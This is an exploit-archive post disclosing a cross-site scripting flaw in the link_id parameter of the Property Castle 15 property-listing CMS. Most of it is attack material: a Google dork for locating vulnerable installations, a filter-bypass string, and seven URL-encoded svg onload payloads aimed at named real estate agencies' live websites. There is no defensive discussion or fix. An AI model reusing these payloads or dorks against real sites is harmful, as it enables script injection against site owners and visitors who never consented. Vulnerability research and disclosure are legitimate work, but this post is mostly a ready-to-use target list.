Home / os / winmobile

Property Castle 15 Cross Site Scripting

Posted on 08 December 2015

###################### # Exploit Title : Property Castle XSS Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.propertycastle.com/ # Google Dork : intext:"Powered By Property Castle " inurl:link_id= OR inurl:"/cms/cms.php?link_id=" # Date : 2015/12/06 # Version : PC15 # ###################### # # Vulnerable Paramter link_id= # # Bypass '>"> # # Demo: # #http://www.langworthyestates.com/properties/cms/cms.php?link_id=4%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E # #http://www.olivebranchestate.co.uk/properties/cms/cms.php?link_id=25%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E # #http://www.timesestates.co.uk/properties/cms/cms.php?link_id=23%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E # #http://www.primelodgeestates.com/properties/cms/cms.php?link_id=11%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E # #http://www.phillipshawltd.com/properties/cms/cms.php?link_id=24%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E # #http://www.mskproperties.com/properties/cms/cms.php?link_id=23%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E # #http://www.champsestates.co.uk/properties/cms/cms.php?link_id=7%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E # # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) ######################

 

TOP